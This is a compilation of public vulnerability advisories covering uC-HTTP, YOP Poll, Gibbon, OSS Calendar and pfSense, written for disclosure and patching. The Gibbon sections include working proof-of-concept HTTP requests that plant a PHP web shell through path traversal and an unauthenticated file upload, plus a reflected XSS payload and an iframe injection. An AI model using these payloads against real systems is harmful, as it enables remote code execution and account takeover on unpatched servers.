A memory corruption vulnerability exists in the HTTP Server header parsing functionality of Weston Embedded uC-HTTP v3.01.01. Specially crafted network packets can lead to code execution. An attacker can send a malicious packet to trigger this vulnerability.

**SUMMARY**

A memory corruption vulnerability exists in the HTTP Server header parsing functionality of Weston Embedded uC-HTTP v3.01.01. Specially crafted network packets can lead to code execution. An attacker can send a malicious packet to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Weston Embedded uC-HTTP v3.01.01  
Weston Embedded Cesium NET 3.07.01  
Silicon Labs Gecko Platform 4.3.1.0

**PRODUCT URLS**

uC-HTTP - https://weston-embedded.com/micrium/overview Cesium NET - https://www.weston-embedded.com/cesium-cs-net Gecko Platform - https://www.silabs.com/developers/gecko-software-development-kit

**CVSSv3 SCORE**

9.0 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-119 - Improper Restriction of Operations within the Bounds of a Memory Buffer

**DETAILS**

The uC-HTTP server implementation is designed to be used on embedded systems that are running the µC/OS II or µC/OS III RTOS kernels. This HTTP server supports many features including persistent connections, form processing, chunked transfer encoding, HTTP header fields processing, HTTP query string processing and dynamic content.

The uC-HTTP server has special handling for the following header fields: Content-Type, Content-Length, Host, Connection. All other supported HTTP header fields are processed by the portion of code containing this vulnerability. When a header field is not equal to one of the previously mentioned fields, it is processed by the default case of a switch statement. When processing the header value, the length is calculated [1] and then checked if it is less than or equal to the configured buffer size [2]. This length value is later used to calculate the pointer value used for NULL termination [3]. If the value of length is exactly equal to the configured size, this results in a one-byte buffer overwrite with the NULL byte [4].

As noted in the mitigations section, this user-defined callback function [0] can be used to disable header field processing.

    File: http-s_req.c
    1759:                     default:
    1760: #if (HTTPs_CFG_HDR_RX_EN == DEF_ENABLED)
    1761:                          if ((p_cfg->HdrRxCfgPtr != DEF_NULL) &&
    1762:                              (p_cfg->HooksPtr    != DEF_NULL)) {
    1763:                              keep = p_cfg->HooksPtr->OnReqHdrRxHook(p_instance,                       /* [0] */
    1764:                                                                     p_conn,
    1765:                                                                     p_cfg->Hooks_CfgPtr,
    1766:                                                                     field);
    ...
    1776:                              if (keep == DEF_YES) {
    ...
    1789:                                 p_val = HTTPsReq_HdrParseValGet(p_field,
    1790:                                                                 p_field_dict_entry->StrLen,
    1791:                                                                 p_field_end,
    1792:                                                                &len);                                 /* [1] */
    ...
    1796:                                     if (len > p_cfg->HdrRxCfgPtr->DataLenMax) {                       /* [2] */
    1797:                                         HTTPs_ERR_INC(p_ctr_errs->Req_ErrHdrDataLenInv);
    1798:                                        *p_err = HTTPS_ERR_REQ_HDR_INVALID_VAL_LEN;
    1799:                                         return;
    1800:                                     }
    ...
    1807:                                     p_str                 = (CPU_CHAR *)p_req_hdr_blk->ValPtr + len;  /* [3] */
    1808:                                    *p_str                 =  ASCII_CHAR_NULL;                         /* [4] */
    1809:                                     p_req_hdr_blk->ValLen =  len + 1;
    

Because of the memory layout implemented by the uC-LIB Memory Library, this one-byte overwrite results in an arbitrary allocation controlled by the attacker, which could be used to gain code execution as explained below.

When a heap object is freed using uC-LIB Memory Mem_DynPoolBlkFree, the pointer to the next free chunk of memory within that pool is stored in the first 4 bytes of that memory block [0].

    File: lib_mem.c
    2072: void  Mem_DynPoolBlkFree (MEM_DYN_POOL  *p_pool,
    2073:                           void          *p_blk,
    2074:                           LIB_ERR       *p_err)
    2075: {
    ...
    2109:    *((void **)p_blk)   = p_pool->BlkFreePtr;              /* [0] */
    

So, when this NULL byte overwrite occurs and the following heap block has been allocated and freed previously, this will overwrite the least significant byte of the next free pointer address. It is possible for the attacker to influence allocations such that when overwriting the least significant byte, the new pointer address will point to a buffer containing attacker-controlled data. When this happens, on the next allocation of the heap pool which contains the corrupted free pointer, that same corrupt pointer will be dereferenced and stored in the pool object as the next free pointer [1]. This dereferenced value is attacker-controlled, since the corrupted pointer now points to an attacker-controlled buffer as a result of this vulnerability. On the next call to Mem_DynPoolBlkGet, the dereferenced attacker-controlled value will be the pointer which is allocated [0]. The result of this is that the attacker has the ability to allocate memory at an arbitrary address. The impact of an attacker being able to allocate an arbitrary address is that now the attacker can write data anywhere in the program memory space, which could lead to things like overwriting stack data or a function pointer in order to gain code execution.

    File: lib_mem.c
    1978: void  *Mem_DynPoolBlkGet (MEM_DYN_POOL  *p_pool,
    1979:                           LIB_ERR       *p_err)
    1980: {
    ...
    2014:         p_blk              = p_pool->BlkFreePtr;          /* [0] */
    2015:         p_pool->BlkFreePtr = *((void **)p_blk);           /* [1] */
    

**Crash Information**

    Program received signal SIGSEGV, Segmentation fault.
    0x5656942a in Mem_DynPoolBlkGet (p_pool=0x56576578 <Mem_Heap+408>, p_err=0xffffd3bc) at uc-lib/lib_mem.c:2015
    2015	        p_pool->BlkFreePtr = *((void **)p_blk);
    (gdb) i r
    eax            0x41414141          1094795585
    ecx            0x56577223          1448571427
    edx            0x2                 2
    ebx            0x56575f64          1448566628
    esp            0xffffd370          0xffffd370
    ebp            0xffffd388          0xffffd388
    esi            0xf7f91000          -134672384
    edi            0xf7f91000          -134672384
    eip            0x5656942a          0x5656942a <Mem_DynPoolBlkGet+124>
    eflags         0x10206             [ PF IF RF ]
    cs             0x23                35
    ss             0x2b                43
    ds             0x2b                43
    es             0x2b                43
    fs             0x0                 0
    gs             0x63                99
    k0             0x0                 0
    k1             0x0                 0
    k2             0x0                 0
    k3             0x0                 0
    k4             0x0                 0
    k5             0x0                 0
    k6             0x0                 0
    k7             0x0                 0
    (gdb) bt
    #0  0x5656942a in Mem_DynPoolBlkGet (p_pool=0x56576578 <Mem_Heap+408>, p_err=0xffffd3bc) at uc-lib/lib_mem.c:2015
    #1  0x56563f36 in HTTPsMem_ReqHdrGet (p_instance=0x565763fc <Mem_Heap+28>, p_conn=0x56576928 <Mem_Heap+1352>, 
        hdr_field=HTTP_HDR_FIELD_ACCEPT_ENCODING, val_type=HTTP_HDR_VAL_TYPE_STR_DYN, p_err=0xffffd48c)
        at Server/Source/http-s_mem.c:2141
    #2  0x5655a1f2 in HTTPsReq_HdrParse (p_instance=0x565763fc <Mem_Heap+28>, p_conn=0x56576928 <Mem_Heap+1352>, p_err=0xffffd48c)
        at Server/Source/http-s_req.c:1780
    #3  0x56558c49 in HTTPsReq_Handle (p_instance=0x565763fc <Mem_Heap+28>, p_conn=0x56576928 <Mem_Heap+1352>)
        at Server/Source/http-s_req.c:325
    #4  0x5655c97a in HTTPsConn_Process (p_instance=0x565763fc <Mem_Heap+28>) at Server/Source/http-s_conn.c:166
    #5  0x5655ecfc in HTTPsTask_InstanceTaskHandler (p_instance=0x565763fc <Mem_Heap+28>) at Server/Source/http-s_task.c:814
    #6  0x5655ea62 in HTTPsTask_InstanceTask (p_data=0x565763fc <Mem_Heap+28>) at Server/Source/http-s_task.c:653
    #7  0x5656680d in KAL_TaskCreate (task_handle=..., p_fnct=0x5655ea3d <HTTPsTask_InstanceTask>, 
        p_task_arg=0x565763fc <Mem_Heap+28>, prio=17 '\021', p_cfg=0x0, p_err=0xffffd5e0) at uc-shims/Source/kal-shim.c:59
    #8  0x5655e781 in HTTPsTask_InstanceTaskCreate (p_instance=0x565763fc <Mem_Heap+28>, p_err=0xffffd654)
        at Server/Source/http-s_task.c:331
    #9  0x5655c179 in HTTPs_InstanceStart (p_instance=0x565763fc <Mem_Heap+28>, p_err=0xffffd654) at Server/Source/http-s.c:812
    #10 0x56557e2b in main (argc=1, argv=0xffffd714) at server_app.c:118
    (gdb)
    

**Mitigation**

This vulnerability could be mitigated by making use of the application-specific callback function OnReqHdrRxHook, which is called HTTPs_ReqHdrRxHook in this example. A user could prevent this vulnerability from being triggered by blocking the processing of any unnecessary header fields by the HTTP server. Example code to mitigate this vulnerability is below:

    /*
    *********************************************************************************************************
    *                                       HTTPs_ReqHdrRxHook()
    *
    * Description : Called each time a header field is parsed in a request message. Allows to choose which
    *               additional header field(s) need to be processed by the upper application.
    *
    * Argument(s) : p_instance  Pointer to the HTTPs instance object.
    *
    *               p_conn      Pointer to the HTTPs connection object.
    *
    *               p_hook_cfg  Pointer to hook configuration object.
    *
    *               hdr_field   Type of the header field received.
    *                               See the HTTPs_HDR_FIELD declaration in http-s.h file for all the header types supported.
    *
    * Return(s)   : DEF_YES,   If the header field needs to be process.
    *               DEF_NO,    Otherwise.
    *
    * Caller(s)   : HTTPs_ReqHdrParse() via 'p_cfg->HooksPtr->OnReqHdrRxHook()'.
    *
    * Note(s)     : (1) The instance structure is for read-only. It MUST NOT be modified.
    *
    *               (2) The connection structure SHOULD NOT be modified. It should be only read to determine if the header
    *                   type must be stored.
    *********************************************************************************************************
    */
    
    static  CPU_BOOLEAN  HTTPs_ReqHdrRxHook (const  HTTPs_INSTANCE   *p_instance,
                                            const  HTTPs_CONN       *p_conn,
                                            const  void             *p_hook_cfg,
                                                    HTTP_HDR_FIELD    hdr_field)
    {
        return (DEF_NO);
    }
    

Another mitigation option is to modify the code within uC-HTTP itself. An example bugfix is below, where the length is not allowed to be equal to the configured size of the buffer. Example bugfix below:

    diff --git a/Server/Source/http-s_req.c b/Server/Source/http-s_req.c
    index d487160..33ccf57 100644
    --- a/Server/Source/http-s_req.c
    +++ b/Server/Source/http-s_req.c
    @@ -1793,7 +1793,7 @@ static  void  HTTPsReq_HdrParse (HTTPs_INSTANCE  *p_instance,
                                    if (p_val != DEF_NULL) {
                                        len = p_field_end - p_val;
    
    -                                    if (len > p_cfg->HdrRxCfgPtr->DataLenMax) {
    +                                    if (len >= p_cfg->HdrRxCfgPtr->DataLenMax) {
                                            HTTPs_ERR_INC(p_ctr_errs->Req_ErrHdrDataLenInv);
                                            *p_err = HTTPS_ERR_REQ_HDR_INVALID_VAL_LEN;
                                            return;
    

**TIMELINE**

2023-03-29 - Vendor Disclosure  
2023-06-23 - Vendor Patch Release  
2023-11-14 - Public Release

Discovered by Kelly Leuschner of Cisco Talos.

CVE-2023-28391: TALOS-2023-1732 || Cisco Talos Intelligence Group

The YOP Poll plugin for WordPress is vulnerable to a race condition in all versions up to, and including, 6.5.26. This is due to improper restrictions on the add() function. This makes it possible for unauthenticated attackers to place multiple votes on a single poll even when the poll is set to one vote per person.

This record contains material that is subject to copyright.

**Copyright 2012-2023 Defiant Inc.**

**License:** Defiant hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute this software vulnerability information. Any copy of the software vulnerability information you make for such purposes is authorized provided that you include a hyperlink to this vulnerability record and reproduce Defiant's copyright designation and this license in any such copy. **Read more.**

**Copyright 1999-2023 The MITRE Corporation**

**License:** CVE Usage: MITRE hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute Common Vulnerabilities and Exposures (CVE®). Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy. **Read more.**

Have information to add, or spot any errors? Contact us at wfi-support@wordfence.com so we can make any appropriate adjustments.

CVE-2023-6109: YOP Poll <= 6.5.26 - Race Condition to Vote Manipulation — Wordfence Intelligence

GibbonEdu Gibbon through version 25.0.0 allows Directory Traversal via the report template builder. An attacker can create a new Asset Component. The templateFileDestination parameter can be set to an arbitrary pathname (and extension). This allows creation of PHP files outside of the uploads directory, directly in the webroot.

**usd-2023-0022 | Path-Traversal**

**Advisory ID**: usd-2023-0022  
**Product**: Gibbon (https://gibbonedu.org/)  
**Affected Version**: 25.0.00  
**Vulnerability Type**: CWE-23  
**Security Risk**: Critical  
**Vendor URL**: https://gibbonedu.org  
**Vendor acknowledged vulnerability**: Yes  
**Vendor Status**: Fixed  
**CVE number**: CVE-2023-45880

**Desciption**

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes  
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

The application allows high priviliged users to create report templates.  
The report template builder is vulnerable to a Path Traversal vulnerability.

The "uploads" directory is not accessible by default, however it is possible to write files directly in the web root.  
Even the file extension can be manipulated which results in an arbitrary file write vulnerability.

**Proof of Concept**

In the first step, we need to duplicate one of the existing assets. This can be done on the **Home > Reports > Template Builder > Manage Assets** page.

The original request that is triggered is shown below:

POST /modules/Reports/templates\_assets\_components\_duplicateProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="address"

/modules/Reports/templates\_assets\_components\_duplicate.php
------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="gibbonReportPrototypeSectionID"

0000000025
------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="templateFileDestination"

footers/pageNumber.twig.html
------WebKitFormBoundaryGDOtYymhe5cRMATP--

The **templateFileDestination** parameter shows where the component template will be saved to. The file can be moved to the webroot, to make it accessible. An attacker can even change the file extension to **php**.

POST /modules/Reports/templates\_assets\_components\_duplicateProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="address"

/modules/Reports/templates\_assets\_components\_duplicate.php
------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="gibbonReportPrototypeSectionID"

0000000025
------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="templateFileDestination"

../../../usd.php
------WebKitFormBoundaryGDOtYymhe5cRMATP--

The file can be created from within the web application. You can insert PHP code and receive remote code execution.

This will result in the following request to be triggered

POST /modules/Reports/templates\_assets\_components\_editProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="address"

/modules/Reports/templates\_assets\_components\_edit.php
------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="gibbonReportPrototypeSectionID"

0000000028
------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="name"

Page Number
------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="templateFile"

../../../usd.php
------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="templateContent"

<?php echo system($\_GET\['cmd'\]);?>
------WebKitFormBoundaryfnqLMucCLAXR1frS--

It should be noted, that the frontend will return an error that the request "failed due to a database error". However, the file is still created and populated with the payload.  
The following screenshot shows, that the file was successfully created and populated with the payload.  

**Fix**

It is recommended to prevent passing user-supplied input to filesystem operations.  
If this is required, escape user input before processing it. Use a whitelist approach to only allow valid input.

**References**

*   https://owasp.org/www-project-web-security-testing-guide/latest/4-Web\_Application\_Security\_Testing/05-Authorization\_Testing/01-Testing\_Directory\_Traversal\_File\_Include

**Timeline**

*   **2023-07-11**: Vulnerability identified by Christian Poeschl
*   **2023-09-19**: Security Release v25.0.01
*   **2023-11-02**: Advisory published

**Credits**

This security vulnerability was identified by Christian Poeschl of usd AG.

CVE-2023-45880: usd-2023-0022 - usd HeroLab

SQL injection vulnerability in OSS Calendar versions prior to v.2.0.3 allows a remote authenticated attacker to execute arbitrary code or obtain and/or alter the information stored in the database by sending a specially crafted request.

\* English version is below \*  
平素より OSS Calendar をご利用いただきありがとうございます。  
この度 OSS Calendar に脆弱性が発見されました。  
修正されたバージョンである 2.0.3 をリリースしましたのでお知らせいたします。

【対象アプリケーション】  
Version 2.0.3 より前にリリースされた OSS Calendar.

【概要】  
　OSS Calendar にログインしたユーザーによる SQL インジェクション攻撃が可能となります。

【影響】  
　攻撃者は、脆弱な OSS Calendar にログインする事で、以下の事象を引き起こすことが可能です。  
　　・サーバ内の情報窃取  
　　・サーバ内の情報改ざん  
　　・サーバ上のファイルを書き換えることによるシステム破壊

　以下、CVSS v3を基準とした影響度です。

　・深刻度　重要  
　　CVSS v3 基本値：8.8　　CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

【回避方法】  
　OSS Calendar にログインした状態でのみ本脆弱性は悪用可能となります。  
　以下の対策を講じることで、攻撃者のログインを阻止し、脆弱性の影響を  
　回避することが期待できます  
　　・対象システムに対するアクセスを信頼できる接続元のみに制限  
　　・不要なアカウントの削除  
　　・容易に推測可能なパスワードを利用している場合、より複雑なパスワードへの変更

【対策方法】  
　OSS Calendar Version 2.0.3 へのバージョンアップを実施してください。  
　バージョンアップの方法については GitHub の README.md をご確認ください。

　なお、シンキングリードのサポート契約を締結されているお客様に対しましては修正の適用が完了しておりますのでご安心いただければと存じます。

—- English Version —-

A vulnerability has been identified in OSS Calendar.

Affected Products:  
OSS Calendar prior to Version 2.0.3.

Summary:  
A user who is logged in to the OSS Calendar could execute an SQL Injection attack.

Impact:  
These impacts will occur when an attacker who is logged into the OSS Calendar exploits the vulnerability.

– Information theft and tampering  
– System destruction

The impact according to CVSS v3 is as follows:  
Severity: Important  
CVSS v3 Base Score: 8.8  
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Workaround:  
This vulnerability can only be exploited when an attacker is logged into the OSS Calendar.  
To bypass the impact, consider implementing the following workarounds:

– Limit access to trusted sources.  
– Delete unnecessary accounts.  
– Use more complex and strong passwords in place of simple and weak ones.

Solution:  
Update to the OSS Calendar version 2.0.3.  
For instructions on how to upgrade, please refer to README.md on GitHub.

Furthermore, for customers under our support contract at Thinkingreed, individual corrections have already been completed to address this vulnerability. We hope this provides you with peace of mind.

CVE-2023-47609: Version 2.0.3リリースのお知らせ | OSSカレンダー

GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write because rubrics_visualise_saveAjax.phps does not require authentication. The endpoint accepts the img, path, and gibbonPersonID parameters. The img parameter is expected to be a base64 encoded image. If the path parameter is set, the defined path is used as the destination folder, concatenated with the absolute path of the installation directory. The content of the img parameter is base64 decoded and written to the defined file path. This allows creation of PHP files that permit Remote Code Execution (unauthenticated).

**usd-2023-0025 | Arbitrary File Write**

**Advisory ID**: usd-2023-0025  
**Product**: Gibbon (https://gibbonedu.org/)  
**Affected Version**: 25.0.01 (before commit '226d83568cf3d447c4d86d4e5aba2c6e6289045d')  
**Vulnerability Type**: CWE-434  
**Security Risk**: Critical  
**Vendor URL**: https://gibbonedu.org  
**Vendor acknowledged vulnerability**: Yes  
**Vendor Status**: Fixed  
**CVE number**: CVE-2023-45878

**Desciption**

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes  
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

Unauthenticated attackers can upload arbitrary files to the application and receive code execution on the underlying system.  
To receive RCE an attacker must craft a _fake_ image which can be stored as PHP file.

**Proof of Concept**

The _Rubrics_ module has a file **rubrics\_visualise\_saveAjax.php** (source )which can be accessed without being authenticated.

The file accepts the **img**, **path** and **gibbonPersonID** as POST parameters.

From the source line 22:

\[...\]  
$img \= $\_POST\['img'\] ?? null;  
$imgPath \= $\_POST\['path'\] ?? null;  
$gibbonPersonID \= !empty($\_POST\['gibbonPersonID'\]) ? str\_pad($\_POST\['gibbonPersonID'\], 10, '0', STR\_PAD\_LEFT) : null;  
$absolutePath \= $gibbon->session->get('absolutePath');  

The **img** parameter is expected to be a base64 encoded image as of line 32-34:

\[...\]  
// Decode raw image data  
list($type, $img) \= explode(';', $img);  
list(, $img)      \= explode(',', $img);  
$img \= base64\_decode($img);  

If the **path** parameter is set, the defined path is used as the destination folder, concatinated with the absolute path of the gibbon installation directory.

The value of the **img** parameter is written to the defined file path as of line 49-51:

// Write image data  
$fp \= fopen($absolutePath.'/'.$imgPath, 'w');  
fwrite($fp, $img);  
fclose($fp);  

The following request will write the payload **<?php echo system($\_GET\['cmd'\])?>** to the file **asdf.php**.

POST /modules/Rubrics/rubrics\_visualise\_saveAjax.php HTTP/1.1  
Host: localhost:8080  
\[...\]

img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8%2b&path=asdf.php&gibbonPersonID=0000000001

The payload must be base64 encoded seperated by **;** and **,** characters.

**Fix**

Ensure that only valid file types can be uploaded.

**References**

*   https://github.com/GibbonEdu/core/tree/16638b849220dd24ed1e536b44b76e222ae0f6c0

**Timeline**

*   **2023-07-11**: Vulnerability identified by Christian Poeschl
*   **2023-09-19**: Security Release v25.0.01
*   **2023-11-02**: Advisory published

**Credits**

This security vulnerability was identified by Christian Poeschl of usd AG.

CVE-2023-45878: usd-2023-0025 - usd HeroLab

GibbonEdu Gibbon through version 25.0.0 allows /modules/Planner/resources_addQuick_ajaxProcess.php file upload with resultant XSS. The imageAsLinks parameter must be set to Y to return HTML code. The filename attribute of the bodyfile1 parameter is reflected in the response.

**usd-2023-0024 | Cross-Site Scripting**

**Advisory ID**: usd-2023-0024  
**Product**: Gibbon  
**Affected Version**: 25.0.00  
**Vulnerability Type**: CWE-79  
**Security Risk**: High  
**Vendor URL**: https://gibbonedu.org  
**Vendor acknowledged vulnerability**: Yes  
**Vendor Status**: Fixed  
**CVE number**: CVE-2023-45881

**Desciption**

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes  
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

A reflected XSS was found in the filename of uploaded files.  
This can lead to the creation of arbitrary high privileged accounts.

**Proof of Concept**

The application allows to upload files without prior authentication using the

/modules/Planner/resources\_addQuick\_ajaxProcess.php

endpoint.

The following request can be used to upload files to the server:

POST /modules/Planner/resources\_addQuick\_ajaxProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="id"

body
------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyaddress"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile1"; filename="../<img src=X onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>.gif"
Content-Type: text/plain

<!DOCTYPE html>
<html><h1>hello</h1>/html>

------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile2"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile3"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile4"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="imagesAsLinks"

Y
------WebKitFormBoundaryeSZWbY4RNteSpbi4--

The **imagesAsLinks** parameter must be set to **Y** to return HTML code.  
The _filename_ attribute of the **bodyfile1** parameter is reflected in the response.

The response of the request will look like:

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: G5ad8ffa23a25972f=uauluvtju3kvlave1ushepkvjo; path=/; HttpOnly; SameSite=Lax
\[...\]

&lta target='\_blank' style='font-weight: bold' href='http://localhost:8080/uploads/2023/07/imgsrcXonerrorevalatobYWxlcnQoZG9jdW1lbnQuZG9tYWluKQ\_Go0qk7tKRgW0S9X8.gif'>&ltimg src=X onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>

**Fix**

It is recommended to treat all input on the website as potentially dangerous.

**References**

*   https://cwe.mitre.org/data/definitions/79.html

**Timeline**

*   **2023-07-11**: Vulnerability identified by Christian Poeschl
*   **2023-09-19**: Security Release v25.0.01
*   **2023-11-02**: Advisory published

**Credits**

This security vulnerability was identified by Christian Poeschl of usd AG.

CVE-2023-45881: usd-2023-0024 - usd HeroLab

GibbonEdu Gibbon version 25.0.0 allows HTML Injection via an IFRAME element to the Messager component.

**usd-2023-0019 | HTML Injection**

**Advisory ID**: usd-2023-0019  
**Product**: Gibbon (https://gibbonedu.org/)  
**Affected Version**: 25.0.00  
**Vulnerability Type**: CWE-79  
**Security Risk**: Medium  
**Vendor URL**: https://gibbonedu.org  
**Vendor acknowledged vulnerability**: Yes  
**Vendor Status**: Fixed  
**CVE number**: CVE-2023-45879

**Desciption**

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes  
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

A user with permissions to send messages can inject an **iframe** into the application.  
This can be used to abuse a XSS/CSRF vulnerability in the admin backend, to create a new admin user.

The message can be send to an existing admin user. When the target opens the message, the (hidden) **iframe** will be embedded into the application.

**Proof of Concept**

To create the message, navigate to the _Home > Messenger > New Message_ site.

Fill the form and select an admin user as reciepent. Intercept the request and change the message body to

<iframe src="http://responsible-disclosure:8989/index.html"></iframe>

POST /modules/Messenger/messenger\_postProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="address"


/modules/Messenger/messenger\_post.php
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="subject"

test
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="body"

<p><iframe src="http://localhost:8989/index.html"></iframe></p>
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
\[...\]
Content-Disposition: form-data; name="individualList\[\]"

0000000001
------WebKitFormBoundaryHs6JkrrxpoUfeRfX--

As shown in the screenshot below, the iframe is injected into the message.  

**Fix**

It is recommended to treat all input on the website as potentially dangerous.

**References**

*   https://owasp.org/www-project-web-security-testing-guide/latest/4-Web\_Application\_Security\_Testing/11-Client-side\_Testing/03-Testing\_for\_HTML\_Injection

**Timeline**

*   **2023-06-27**: Vulnerability identified by Christian Poeschl
*   **2023-09-19**: Security Release v25.0.01
*   **2023-11-02**: Advisory published

**Credits**

This security vulnerability was identified by Christian Poeschl of usd AG.

CVE-2023-45879: usd-2023-0019 - usd HeroLab

An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-23\_10.webgui Security Advisory pfSense Topic: Authenticated Command Execution in the WebGUI Category: pfSense Base System Module: webgui Announced: 2023-10-31 Credits: Oskar Zeino-Mahmalat (Sonar) CVE ID: CVE-2023-42326 Affects: pfSense Plus software versions <= 23.05.1 pfSense CE software versions <= 2.7.0 Corrected: 2023-07-05 19:31:30 UTC (pfSense Plus master, 23.09) 2023-07-05 19:31:30 UTC (pfSense CE master, 2.8.0) 0. Revision History v1.0 2023-10-31 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description A potential authenticated arbitrary command execution vulnerability was found in interfaces\_gif\_edit.php and interfaces\_gre\_edit.php, components of the pfSense Plus and pfSense CE software GUI. When creating or editing a GIF interface on interfaces\_gif\_edit.php or a GRE interface on interfaces\_gre\_edit.php, the submitted POST "gifif" or "greif" value is not validated. Subsequently, the value is passed to another function where the submitted value is used in shell commands. This problem is present on pfSense Plus version 23.05.1, pfSense CE version 2.7.0, and earlier versions of both. III. Impact Due to a lack of escaping on commands in the functions being called, it is possible to execute arbitrary commands with a properly formatted submission value for "gifif" or "greif" in POST operations. The user must be logged in and have sufficient privileges to access either interfaces\_gif\_edit.php or interfaces\_gre\_edit.php. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: \* Limit access to the affected pages to trusted administrators only. \* Do not log into the firewall with the same browser used for non- administrative web browsing. V. Solution Users can upgrade to pfSense Plus software version 23.09 or later, or a pfSense CE software version after 2.7.0, when one is available. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus version 23.05.1 and pfSense CE version 2.7.0 may apply the fix from the recommended patches list in the System Patches package. Users may also manually apply the relevant revisions below using the System Patches package on earlier versions, or by manually making similar changes to the affected files if the patches do not apply directly. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- plus/plus-master d69d6c8424ab4299234fb5ec6964682e2e6cbcdd pfSense/master d69d6c8424ab4299234fb5ec6964682e2e6cbcdd - - ------------------------------------------------------------------------- VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmU/wRgACgkQE7mH/ZIU +NpQWQ/+N55UGKjB+ZFEtXRV/d9Pl66TII2D28U8+v4iGNlcmo6jTC2mofYaQ77C dybvlyXM86lH1dDnzzv6uuEIjtSWyN0aM37ndfGDR7CxB5sgUXLkl+jeIdqZXqA2 IJgAdw59GCkeGttw9bCoIs7ZADlpx5/n37LMztxMHfgmw4KknEiBy1PF1YDIh4iD mwhqQLqDlhzcWOcqEAtECgpSoaIYd5Yd3/pNPtIsYhDg4QxSOCT6KGQuU/msTVru OmUE+qbjaFKu7oUKNdYtdpC4jgZ44SJLLNikLLyoxpcb/IqBOjqIDCXfq1Du8gJG 5QROPevZOfXbgFSKHF3zJlqcCFAVt4iAuazXFWjyHksU9jjMfxYvRvRxqqAJCXsF W3z3ib+sSjlooNSN/KOdQNQvmBlN1epWfhHWgNnoQQBS5S75nyomgbu/7Gbo+GWY 